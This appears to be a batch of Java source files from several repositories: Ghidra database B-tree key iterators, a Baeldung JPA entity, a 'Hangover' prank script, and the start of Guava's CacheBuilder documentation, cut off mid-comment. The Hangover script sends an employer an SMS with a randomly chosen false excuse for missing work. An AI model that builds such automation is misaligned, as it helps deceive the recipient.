lastKey = key;
hasLastKey = true;
return key;
}
throw new NoSuchElementException();
}
@Override
public boolean delete() throws IOException {
if (hasLastKey) {
synchronized (db) {
long deleteKey = lastKey;
hasLastKey = false;
boolean success = deleteRecord(deleteKey);
int newLen = keys.length - 1;
if (deleteKey == key && keys.length > 1 /* && keyIndex < newLen */) {
long[] newKeys = new long[newLen];
System.arraycopy(keys, 0, newKeys, 0, keyIndex);
System.arraycopy(keys, keyIndex + 1, newKeys, keyIndex, newLen - keyIndex);
keys = newKeys;
keyIndex = -(keyIndex + 1); // reflects non-existent key to initialize method
}
else {
keys = null;
}
initialize(deleteKey);
return success;
}
}
return false;
}
}
/**
* A long key iterator class - optimized for short iterations since
* the number of keys read from each record node is minimized.
*/
private class ShortDurationLongKeyIterator implements DBLongIterator {
private int bufferId;
private int keyIndex;
private long key;
private long lastKey;
private boolean hasLastKey = false;
private int expectedModCount;
private boolean hasPrev;
private boolean hasNext;
private long minKey;
private long maxKey;
/**
* Construct a record iterator.
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value.
* @throws IOException thrown if IO error occurs
*/
ShortDurationLongKeyIterator(long minKey, long maxKey, long startKey) throws IOException {
this.minKey = minKey;
this.maxKey = maxKey;
this.key = startKey;
initialize(startKey);
}
/**
* Initialize (or re-initialize) iterator state.
* An empty or null keys array will force a complete initialization.
* Otherwise, following the deletethe keys array and keyIndex should reflect the state
* following a delete.
* @param targetKey the initial key. For construction this is the startKey,
* following a delete this is the deleted key.
* @throws IOException thrown if IO error occurs
*/
private void initialize(long targetKey) throws IOException {
expectedModCount = modCount;
hasPrev = false;
hasNext = false;
bufferId = -1;
if (rootBufferId < 0) {
return;
}
try {
LongKeyRecordNode leaf = null;
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
leaf = rootNode.getLeafNode(targetKey);
bufferId = leaf.getBufferId();
// Empty leaf node - special case
if (leaf.keyCount == 0) {
keyIndex = -1;
return;
}
keyIndex = leaf.getKeyIndex(targetKey);
// Start key was found
if (keyIndex >= 0) {
key = leaf.getKey(keyIndex);
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
keyIndex = -(keyIndex + 1);
if (keyIndex == leaf.keyCount) {
--keyIndex;
key = leaf.getKey(keyIndex);
hasPrev = key >= minKey;
}
else {
key = leaf.getKey(keyIndex);
hasNext = key <= maxKey;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
private void reset() throws IOException {
boolean hadNext = hasNext;
boolean hadPrev = hasPrev;
initialize(key);
if (hasNext && hasPrev) {
hasNext = hadNext;
hasPrev = hadPrev;
}
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasNext) {
if (bufferId < 0 || keyIndex < 0) {
return false;
}
// Check next key index
int nextIndex = keyIndex + 1;
try {
// Process next leaf if needed
LongKeyRecordNode leaf =
(LongKeyRecordNode) nodeMgr.getLongKeyNode(bufferId);
if (nextIndex >= leaf.keyCount) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return false;
}
long nextKey = leaf.getKey(0);
if (nextKey > maxKey) {
return false;
}
bufferId = leaf.getBufferId();
key = nextKey;
keyIndex = 0;
hasNext = true;
hasPrev = false;
}
// else, use keys cache
else {
long nextKey = leaf.getKey(nextIndex);
hasNext = (nextKey <= maxKey);
if (hasNext) {
key = nextKey;
keyIndex = nextIndex;
hasPrev = false;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasPrev) {
if (bufferId < 0 || keyIndex < 0) {
return false;
}
// Check previous key index
int prevIndex = keyIndex - 1;
try {
// Process previous leaf if needed
LongKeyRecordNode leaf =
(LongKeyRecordNode) nodeMgr.getLongKeyNode(bufferId);
if (prevIndex < 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return false;
}
prevIndex = leaf.keyCount - 1;
long prevKey = leaf.getKey(prevIndex);
if (prevKey < minKey) {
return false;
}
bufferId = leaf.getBufferId();
key = prevKey;
keyIndex = prevIndex;
hasNext = false;
hasPrev = true;
}
// else, use keys cache
else {
long prevKey = leaf.getKey(prevIndex);
hasPrev = prevKey >= minKey;
if (hasPrev) {
key = prevKey;
keyIndex = prevIndex;
hasNext = false;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasPrev;
}
}
@Override
public long next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastKey = key;
hasLastKey = true;
return key;
}
throw new NoSuchElementException();
}
@Override
public long previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastKey = key;
hasLastKey = true;
return key;
}
throw new NoSuchElementException();
}
@Override
public boolean delete() throws IOException {
if (hasLastKey) {
hasLastKey = false;
return deleteRecord(lastKey);
}
return false;
}
}
/**
* A Field key iterator class. The initial iterator is optimized for
* short iterations. If it determined that the iterator is to be used
* for a large number of iterations, the underlying iterator is switched
* to one optimized for longer iterations.
*/
private class FieldKeyIterator implements DBFieldIterator {
private static final int SHORT_ITER_THRESHOLD = 10;
private DBFieldIterator keyIter;
private int iterCnt = 0;
/**
* Construct a record iterator. (requires DBHandle lock)
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param startKey the first primary key value. If null minKey will be assumed,
* if still null the minimum indexed value will be assumed.
* @throws IOException thrown if IO error occurs
*/
FieldKeyIterator(Field minKey, Field maxKey, Field startKey) throws IOException {
keyIter = new ShortDurationFieldKeyIterator(minKey, maxKey, startKey);
}
/**
* Construct a record iterator. (requires DBHandle lock)
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param before true if initial position is before range, else after range
* @throws IOException thrown if IO error occurs
*/
FieldKeyIterator(Field minKey, Field maxKey, boolean before) throws IOException {
Field startKey = before ? minKey : maxKey;
if (startKey == null && !before && rootBufferId != -1) {
try {
FieldKeyNode rightmostLeaf =
getFieldKeyNode(rootBufferId).getRightmostLeafNode();
startKey = rightmostLeaf.getKeyField(rightmostLeaf.getKeyCount() - 1);
}
finally {
nodeMgr.releaseNodes();
}
}
keyIter = new ShortDurationFieldKeyIterator(minKey, maxKey, startKey);
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (iterCnt <= SHORT_ITER_THRESHOLD) {
if (++iterCnt > SHORT_ITER_THRESHOLD) {
// Switch to long-running iterator
keyIter = new LongDurationFieldKeyIterator((ShortDurationFieldKeyIterator) keyIter);
}
}
return keyIter.hasNext();
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (iterCnt <= SHORT_ITER_THRESHOLD) {
if (++iterCnt > SHORT_ITER_THRESHOLD) {
// Switch to long-running iterator
keyIter = new LongDurationFieldKeyIterator((ShortDurationFieldKeyIterator) keyIter);
}
}
return keyIter.hasPrevious();
}
}
@Override
public Field next() throws IOException {
return keyIter.next();
}
@Override
public Field previous() throws IOException {
return keyIter.previous();
}
@Override
public boolean delete() throws IOException {
return keyIter.delete();
}
}
/**
* A Field key iterator class - optimized for long iterations since
* all keys are read for each record node.
*/
private class LongDurationFieldKeyIterator implements DBFieldIterator {
private int bufferId;
private int keyIndex;
private Field[] keys;
private Field key;
private Field lastKey;
private int expectedModCount;
private boolean hasPrev;
private boolean hasNext;
private Field minKey;
private Field maxKey;
/**
* Iterator hand-off constructor. Transition from short-running to
* long-running iterator.
* @param keyIter partially used short-running iterator
* @throws IOException if IO error occurs
*/
LongDurationFieldKeyIterator(ShortDurationFieldKeyIterator keyIter) throws IOException {
this.bufferId = keyIter.bufferId;
this.keyIndex = keyIter.keyIndex;
this.key = keyIter.key;
this.lastKey = keyIter.lastKey;
this.expectedModCount = keyIter.expectedModCount;
this.hasPrev = keyIter.hasPrev;
this.hasNext = keyIter.hasNext;
this.minKey = keyIter.minKey;
this.maxKey = keyIter.maxKey;
if (bufferId >= 0) {
if (modCount != expectedModCount) {
reset();
}
else {
try {
FieldKeyRecordNode leaf = (FieldKeyRecordNode) getFieldKeyNode(bufferId);
getKeys(leaf);
}
finally {
nodeMgr.releaseNodes();
}
}
}
}
/**
* Initialize (or re-initialize) iterator state. (require DBHandle lock)
* An empty or null keys array will force a complete initialization.
* Otherwise, following the delete the keys array and keyIndex should reflect the state
* following a delete.
* @param targetKey the initial key. For construction this is the startKey,
* following a delete this is the deleted key.
* @throws IOException thrown if IO error occurs
*/
private void initialize(Field targetKey) throws IOException {
expectedModCount = modCount;
hasNext = false;
hasPrev = false;
if (rootBufferId < 0) {
keys = Field.EMPTY_ARRAY;
bufferId = -1;
return;
}
try {
FieldKeyRecordNode leaf = null;
if (keys == null || keys.length == 0) {
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
if (targetKey == null) {
targetKey = minKey;
}
// If startKey not specified, start with leftmost record
if (targetKey == null) {
leaf = rootNode.getLeftmostLeafNode();
getKeys(leaf);
key = keys[0];
keyIndex = 0;
hasNext = true;
return;
}
leaf = rootNode.getLeafNode(targetKey);
getKeys(leaf);
// Empty leaf node - special case
if (keys.length == 0) {
return;
}
keyIndex = leaf.getKeyIndex(targetKey);
}
// Start key was found
if (keyIndex >= 0) {
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
keyIndex = -(keyIndex + 1);
if (keyIndex == keys.length) {
--keyIndex;
hasPrev = minKey == null ? true : (keys[keyIndex].compareTo(minKey) >= 0);
if (!hasPrev) {
if (leaf == null) {
keys = null;
initialize(targetKey);
return;
}
leaf = leaf.getNextLeaf();
if (leaf == null) {
keys = Field.EMPTY_ARRAY;
bufferId = -1;
return;
}
keyIndex = 0;
getKeys(leaf);
hasNext =
maxKey == null ? true : (keys[keyIndex].compareTo(maxKey) <= 0);
}
}
else {
hasNext = maxKey == null ? true : (keys[keyIndex].compareTo(maxKey) <= 0);
if (!hasNext) {
// position to previous record
if (keyIndex == 0) {
if (leaf == null) {
keys = null;
initialize(targetKey);
return;
}
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
keys = Field.EMPTY_ARRAY;
bufferId = -1;
return;
}
keyIndex = leaf.getKeyCount() - 1;
getKeys(leaf);
}
else {
--keyIndex;
}
hasPrev =
minKey == null ? true : (keys[keyIndex].compareTo(minKey) >= 0);
}
}
if (hasNext || hasPrev) {
key = keys[keyIndex];
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
/**
* Reset iterator (require DBHandle lock)
* @throws IOException if IO error occurs
*/
private void reset() throws IOException {
boolean hadNext = hasNext;
boolean hadPrev = hasPrev;
keys = null;
initialize(key);
if (hasNext && hasPrev) {
hasNext = hadNext;
hasPrev = hadPrev;
}
}
private void getKeys(FieldKeyRecordNode node) throws IOException {
bufferId = node.getBufferId();
int keyCount = node.getKeyCount();
if (keys == null || keys.length != keyCount) {
keys = new Field[keyCount];
}
for (int i = 0; i < keyCount; i++) {
keys[i] = node.getKeyField(i);
}
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasNext) {
if (bufferId < 0) {
return false;
}
// Check next key index
int nextIndex = keyIndex + 1;
// Process next leaf if needed
if (nextIndex >= keys.length) {
try {
FieldKeyRecordNode leaf =
((FieldKeyRecordNode) getFieldKeyNode(bufferId)).getNextLeaf();
if (leaf == null ||
(maxKey != null && leaf.getKeyField(0).compareTo(maxKey) > 0)) {
return false;
}
getKeys(leaf);
key = keys[0];
keyIndex = 0;
hasNext = true;
hasPrev = false;
}
finally {
nodeMgr.releaseNodes();
}
}
// else, use keys cache
else {
hasNext = maxKey == null || keys[nextIndex].compareTo(maxKey) <= 0;
if (hasNext) {
key = keys[nextIndex];
keyIndex = nextIndex;
hasPrev = false;
}
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasPrev) {
if (bufferId < 0) {
return false;
}
// Check previous key index
int prevIndex = keyIndex - 1;
// Process previous leaf if needed
if (prevIndex < 0) {
try {
FieldKeyRecordNode leaf =
((FieldKeyRecordNode) getFieldKeyNode(bufferId)).getPreviousLeaf();
if (leaf == null) {
return false;
}
prevIndex = leaf.getKeyCount() - 1;
if (minKey != null &&
leaf.getKeyField(prevIndex).compareTo(minKey) < 0) {
return false;
}
getKeys(leaf);
key = keys[prevIndex];
keyIndex = prevIndex;
hasNext = false;
hasPrev = true;
}
finally {
nodeMgr.releaseNodes();
}
}
// else, use keys cache
else {
hasPrev = minKey == null || keys[prevIndex].compareTo(minKey) >= 0;
if (hasPrev) {
key = keys[prevIndex];
keyIndex = prevIndex;
hasNext = false;
}
}
}
return hasPrev;
}
}
@Override
public Field next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastKey = key;
return key;
}
return null;
}
@Override
public Field previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastKey = key;
return key;
}
return null;
}
@Override
public boolean delete() throws IOException {
if (lastKey != null) {
synchronized (db) {
Field deleteKey = lastKey;
lastKey = null;
boolean success = deleteRecord(deleteKey);
int newLen = keys.length - 1;
if (deleteKey.equals(key) && keys.length > 1 && keyIndex < newLen) {
Field[] newKeys = new Field[newLen];
System.arraycopy(keys, 0, newKeys, 0, keyIndex);
System.arraycopy(keys, keyIndex + 1, newKeys, keyIndex, newLen - keyIndex);
keys = newKeys;
keyIndex = -(keyIndex + 1); // reflects non-existent key to initialize method
}
else {
keys = null;
}
initialize(deleteKey);
return success;
}
}
return false;
}
}
/**
* A Field key iterator class - optimized for short iterations since
* the number of keys read from each record node is minimized.
*/
private class ShortDurationFieldKeyIterator implements DBFieldIterator {
private int bufferId;
private int keyIndex;
private Field lastKey;
private Field key;
private int expectedModCount;
private boolean hasPrev;
private boolean hasNext;
private Field minKey;
private Field maxKey;
/**
* Construct a record iterator. (requires DBHandle lock)
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param startKey the first primary key value. If null minKey will be assumed,
* if still null the minimum indexed value will be assumed.
* @throws IOException if IO error occurs
*/
ShortDurationFieldKeyIterator(Field minKey, Field maxKey, Field startKey) throws IOException {
this.minKey = minKey;
this.maxKey = maxKey;
this.key = startKey;
initialize(startKey);
}
/**
* Initialize (or re-initialize) iterator state.
* An empty or null keys array will force a complete initialization.
* Otherwise, following the delete the keys array and keyIndex should reflect the state
* following a delete.
* @param targetKey the initial key. For construction this is the startKey,
* following a delete this is the deleted key.
* @throws IOException thrown if IO error occurs
*/
private void initialize(Field targetKey) throws IOException {
expectedModCount = modCount;
hasNext = false;
hasPrev = false;
bufferId = -1;
if (rootBufferId < 0) {
return;
}
try {
FieldKeyRecordNode leaf;
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
if (targetKey == null) {
targetKey = minKey;
}
// If startKey not specified, start with leftmost record
if (targetKey == null) {
leaf = rootNode.getLeftmostLeafNode();
bufferId = leaf.getBufferId();
key = leaf.getKeyField(0);
keyIndex = 0;
hasNext = true;
return;
}
leaf = rootNode.getLeafNode(targetKey);
bufferId = leaf.getBufferId();
// Empty leaf node - special case
if (leaf.getKeyCount() == 0) {
keyIndex = -1;
return;
}
keyIndex = leaf.getKeyIndex(targetKey);
// Start key was found
if (keyIndex >= 0) {
key = leaf.getKeyField(keyIndex);
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
keyIndex = -(keyIndex + 1);
if (keyIndex == leaf.getKeyCount()) {
--keyIndex;
key = leaf.getKeyField(keyIndex);
hasPrev = minKey == null ? true : (key.compareTo(minKey) >= 0);
}
else {
key = leaf.getKeyField(keyIndex);
hasNext = maxKey == null ? true : (key.compareTo(maxKey) <= 0);
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
/**
* Reset iterator (requires DBHandle lock)
* @throws IOException if IO error occurs
*/
private void reset() throws IOException {
boolean hadNext = hasNext;
boolean hadPrev = hasPrev;
initialize(key);
if (hasNext && hasPrev) {
hasNext = hadNext;
hasPrev = hadPrev;
}
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasNext) {
if (bufferId < 0 || keyIndex < 0) {
return false;
}
// Check next key index
int nextIndex = keyIndex + 1;
try {
// Process next leaf if needed
FieldKeyRecordNode leaf = (FieldKeyRecordNode) getFieldKeyNode(bufferId);
if (nextIndex >= leaf.getKeyCount()) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return false;
}
Field nextKey = leaf.getKeyField(0);
if (maxKey != null && nextKey.compareTo(maxKey) > 0) {
return false;
}
bufferId = leaf.getBufferId();
key = nextKey;
keyIndex = 0;
hasNext = true;
hasPrev = false;
}
// else, use keys cache
else {
Field nextKey = leaf.getKeyField(nextIndex);
hasNext = maxKey == null ? true : (nextKey.compareTo(maxKey) <= 0);
if (hasNext) {
key = nextKey;
keyIndex = nextIndex;
hasPrev = false;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasPrev) {
if (bufferId < 0 || keyIndex < 0) {
return false;
}
// Check previous key index
int prevIndex = keyIndex - 1;
try {
// Process previous leaf if needed
FieldKeyRecordNode leaf = (FieldKeyRecordNode) getFieldKeyNode(bufferId);
if (prevIndex < 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return false;
}
prevIndex = leaf.getKeyCount() - 1;
Field prevKey = leaf.getKeyField(prevIndex);
if (minKey != null && prevKey.compareTo(minKey) < 0) {
return false;
}
bufferId = leaf.getBufferId();
key = prevKey;
keyIndex = prevIndex;
hasNext = false;
hasPrev = true;
}
// else, use keys cache
else {
Field prevKey = leaf.getKeyField(prevIndex);
hasPrev = minKey == null ? true : (prevKey.compareTo(minKey) >= 0);
if (hasPrev) {
key = prevKey;
keyIndex = prevIndex;
hasNext = false;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasPrev;
}
}
@Override
public Field next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastKey = key;
return key;
}
return null;
}
@Override
public Field previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastKey = key;
return key;
}
return null;
}
@Override
public boolean delete() throws IOException {
if (lastKey != null) {
Field deleteKey = lastKey;
lastKey = null;
return deleteRecord(deleteKey);
}
return false;
}
}
/**
* @return true if table is valid and has not been invalidated
*/
public boolean isInvalid() {
return nodeMgr == null;
}
@Override
public String toString() {
return getName() + "(" + getRecordCount() + ")";
}
}
| NationalSecurityAgency/ghidra | Ghidra/Framework/DB/src/main/java/db/Table.java |
1,118 | package com.baeldung.web;
import jakarta.persistence.Entity;
import jakarta.persistence.GeneratedValue;
import jakarta.persistence.GenerationType;
import jakarta.persistence.Id;
@Entity
public class Foo {
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private long id;
private String name;
public Foo() {
super();
}
public Foo(final String name) {
super();
this.name = name;
}
public Foo(final long id, final String name) {
super();
this.id = id;
this.name = name;
}
// API
public long getId() {
return id;
}
public void setId(final long id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(final String name) {
this.name = name;
}
//
@Override
public int hashCode() {
final int prime = 31;
int result = 1;
result = prime * result + ((name == null) ? 0 : name.hashCode());
return result;
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (getClass() != obj.getClass())
return false;
Foo other = (Foo) obj;
if (name == null) {
if (other.name != null)
return false;
} else if (!name.equals(other.name))
return false;
return true;
}
@Override
public String toString() {
return "Foo [name=" + name + "]";
}
} | eugenp/tutorials | spring-5/src/main/java/com/baeldung/web/Foo.java |
1,120 | import com.twilio.sdk.TwilioRestClient;
import com.twilio.sdk.TwilioRestException;
import com.twilio.sdk.resource.factory.MessageFactory;
import com.twilio.sdk.resource.instance.Message;
import org.apache.http.NameValuePair;
import org.apache.http.message.BasicNameValuePair;
import java.util.ArrayList;
import java.util.List;
import java.util.Random;
public class Hangover {
public static final String ACCOUNT_SID = System.getenv("TWILIO_ACCOUNT_SID");
public static final String AUTH_TOKEN = System.getenv("TWILIO_AUTH_TOKEN");
public static final String YOUR_NUMBER = "1231231231";
public static final String BOSS_NUMBER = "3213213213";
public static void main(String[] args) throws TwilioRestException {
TwilioRestClient client = new TwilioRestClient(ACCOUNT_SID, AUTH_TOKEN);
String[] randomMessages = {
"Locked out",
"Pipes broke",
"Food poisoning",
"Not feeling well"
};
int randomIndex = new Random().nextInt(randomMessages.length);
String finalMessage = (randomMessages[randomIndex]);
List<NameValuePair> params = new ArrayList<NameValuePair>();
params.add(new BasicNameValuePair("Body", "Gonna work from home. " + finalMessage));
params.add(new BasicNameValuePair("From", YOUR_NUMBER));
params.add(new BasicNameValuePair("To", BOSS_NUMBER));
MessageFactory messageFactory = client.getAccount().getMessageFactory();
Message message = messageFactory.create(params);
System.out.println(message.getSid());
}
}
| NARKOZ/hacker-scripts | java/Hangover.java |
1,123 | /*
* Copyright (C) 2009 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.cache;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkState;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.base.Ascii;
import com.google.common.base.Equivalence;
import com.google.common.base.MoreObjects;
import com.google.common.base.Supplier;
import com.google.common.base.Suppliers;
import com.google.common.base.Ticker;
import com.google.common.cache.AbstractCache.SimpleStatsCounter;
import com.google.common.cache.AbstractCache.StatsCounter;
import com.google.common.cache.LocalCache.Strength;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import java.lang.ref.SoftReference;
import java.lang.ref.WeakReference;
import java.util.ConcurrentModificationException;
import java.util.IdentityHashMap;
import java.util.Map;
import java.util.concurrent.TimeUnit;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.annotation.CheckForNull;
/**
* A builder of {@link LoadingCache} and {@link Cache} instances.
*
* <h2>Prefer <a href="https://github.com/ben-manes/caffeine/wiki">Caffeine</a> over Guava's caching
* API</h2>
*
* <p>The successor to Guava's caching API is <a
* href="https://github.com/ben-manes/caffeine/wiki">Caffeine</a>. Its API is designed to make it a
* nearly drop-in replacement. It requires Java 8+, and is not available for Android or GWT/J2CL,
* and may have <a href="https://github.com/ben-manes/caffeine/wiki/Guava">different (usually
* better) behavior</a> when multiple threads attempt concurrent mutations. Its equivalent to {@code
* CacheBuilder} is its <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/Caffeine.html">{@code
* Caffeine}</a> class. Caffeine offers better performance, more features (including asynchronous
* loading), and fewer <a
* href="https://github.com/google/guava/issues?q=is%3Aopen+is%3Aissue+label%3Apackage%3Dcache+label%3Atype%3Ddefect">bugs</a>.
*
* <p>Caffeine defines its own interfaces (<a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/Cache.html">{@code
* Cache}</a>, <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/LoadingCache.html">{@code
* LoadingCache}</a>, <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/CacheLoader.html">{@code
* CacheLoader}</a>, etc.), so you can use Caffeine without needing to use any Guava types.
* Caffeine's types are better than Guava's, especially for <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/AsyncLoadingCache.html">their
* deep support for asynchronous operations</a>. But if you want to migrate to Caffeine with minimal
* code changes, you can use <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/guava/latest/com.github.benmanes.caffeine.guava/com/github/benmanes/caffeine/guava/CaffeinatedGuava.html">its
* {@code CaffeinatedGuava} adapter class</a>, which lets you build a Guava {@code Cache} or a Guava
* {@code LoadingCache} backed by a Guava {@code CacheLoader}.
*
* <p>Caffeine's API for asynchronous operations uses {@code CompletableFuture}: <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/AsyncLoadingCache.html#get(K)">{@code
* AsyncLoadingCache.get}</a> returns a {@code CompletableFuture}, and implementations of <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/AsyncCacheLoader.html#asyncLoad(K,java.util.concurrent.Executor)">{@code
* AsyncCacheLoader.asyncLoad}</a> must return a {@code CompletableFuture}. Users of Guava's {@link
* com.google.common.util.concurrent.ListenableFuture} can adapt between the two {@code Future}
* types by using <a href="https://github.com/lukas-krecan/future-converter#java8-guava">{@code
* net.javacrumbs.futureconverter.java8guava.FutureConverter}</a>.
*
* <h2>More on {@code CacheBuilder}</h2>
*
* {@code CacheBuilder} builds caches with any combination of the following features:
*
* <ul>
* <li>automatic loading of entries into the cache
* <li>least-recently-used eviction when a maximum size is exceeded (note that the cache is
* divided into segments, each of which does LRU internally)
* <li>time-based expiration of entries, measured since last access or last write
* <li>keys automatically wrapped in {@code WeakReference}
* <li>values automatically wrapped in {@code WeakReference} or {@code SoftReference}
* <li>notification of evicted (or otherwise removed) entries
* <li>accumulation of cache access statistics
* </ul>
*
* <p>These features are all optional; caches can be created using all or none of them. By default,
* cache instances created by {@code CacheBuilder} will not perform any type of eviction.
*
* <p>Usage example:
*
* <pre>{@code
* LoadingCache<Key, Graph> graphs = CacheBuilder.newBuilder()
* .maximumSize(10000)
* .expireAfterWrite(10, TimeUnit.MINUTES)
* .removalListener(MY_LISTENER)
* .build(
* new CacheLoader<Key, Graph>() {
* public Graph load(Key key) throws AnyException {
* return createExpensiveGraph(key);
* }
* });
* }</pre>
*
* <p>Or equivalently,
*
* <pre>{@code
* // In real life this would come from a command-line flag or config file
* String spec = "maximumSize=10000,expireAfterWrite=10m";
*
* LoadingCache<Key, Graph> graphs = CacheBuilder.from(spec)
* .removalListener(MY_LISTENER)
* .build(
* new CacheLoader<Key, Graph>() {
* public Graph load(Key key) throws AnyException {
* return createExpensiveGraph(key);
* }
* });
* }</pre>
*
* <p>The returned cache implements all optional operations of the {@link LoadingCache} and {@link
* Cache} interfaces. The {@code asMap} view (and its collection views) have <i>weakly consistent
* iterators</i>. This means that they are safe for concurrent use, but if other threads modify the
* cache after the iterator is created, it is undefined which of these changes, if any, are
* reflected in that iterator. These iterators never throw {@link ConcurrentModificationException}.
*
* <p><b>Note:</b> by default, the returned cache uses equality comparisons (the {@link
* Object#equals equals} method) to determine equality for keys or values. However, if {@link
* #weakKeys} was specified, the cache uses identity ({@code ==}) comparisons instead for keys.
* Likewise, if {@link #weakValues} or {@link #softValues} was specified, the cache uses identity
* comparisons for values.
*
* <p>Entries are automatically evicted from the cache when any of {@link #maximumSize(long)
* maximumSize}, {@link #maximumWeight(long) maximumWeight}, {@link #expireAfterWrite
* expireAfterWrite}, {@link #expireAfterAccess expireAfterAccess}, {@link #weakKeys weakKeys},
* {@link #weakValues weakValues}, or {@link #softValues softValues} are requested.
*
* <p>If {@link #maximumSize(long) maximumSize} or {@link #maximumWeight(long) maximumWeight} is
* requested entries may be evicted on each cache modification.
*
* <p>If {@link #expireAfterWrite expireAfterWrite} or {@link #expireAfterAccess expireAfterAccess}
* is requested entries may be evicted on each cache modification, on occasional cache accesses, or
* on calls to {@link Cache#cleanUp}. Expired entries may be counted by {@link Cache#size}, but will
* never be visible to read or write operations.
*
* <p>If {@link #weakKeys weakKeys}, {@link #weakValues weakValues}, or {@link #softValues
* softValues} are requested, it is possible for a key or value present in the cache to be reclaimed
* by the garbage collector. Entries with reclaimed keys or values may be removed from the cache on
* each cache modification, on occasional cache accesses, or on calls to {@link Cache#cleanUp}; such
* entries may be counted in {@link Cache#size}, but will never be visible to read or write
* operations.
*
* <p>Certain cache configurations will result in the accrual of periodic maintenance tasks which
* will be performed during write operations, or during occasional read operations in the absence of
* writes. The {@link Cache#cleanUp} method of the returned cache will also perform maintenance, but
* calling it should not be necessary with a high throughput cache. Only caches built with {@link
* #removalListener removalListener}, {@link #expireAfterWrite expireAfterWrite}, {@link
* #expireAfterAccess expireAfterAccess}, {@link #weakKeys weakKeys}, {@link #weakValues
* weakValues}, or {@link #softValues softValues} perform periodic maintenance.
*
* <p>The caches produced by {@code CacheBuilder} are serializable, and the deserialized caches
* retain all the configuration properties of the original cache. Note that the serialized form does
* <i>not</i> include cache contents, but only configuration.
*
* <p>See the Guava User Guide article on <a
* href="https://github.com/google/guava/wiki/CachesExplained">caching</a> for a higher-level
* explanation.
*
* @param <K> the most general key type this builder will be able to create caches for. This is
* normally {@code Object} unless it is constrained by using a method like {@code
* #removalListener}. Cache keys may not be null.
* @param <V> the most general value type this builder will be able to create caches for. This is
* normally {@code Object} unless it is constrained by using a method like {@code
* #removalListener}. Cache values may not be null.
* @author Charles Fry
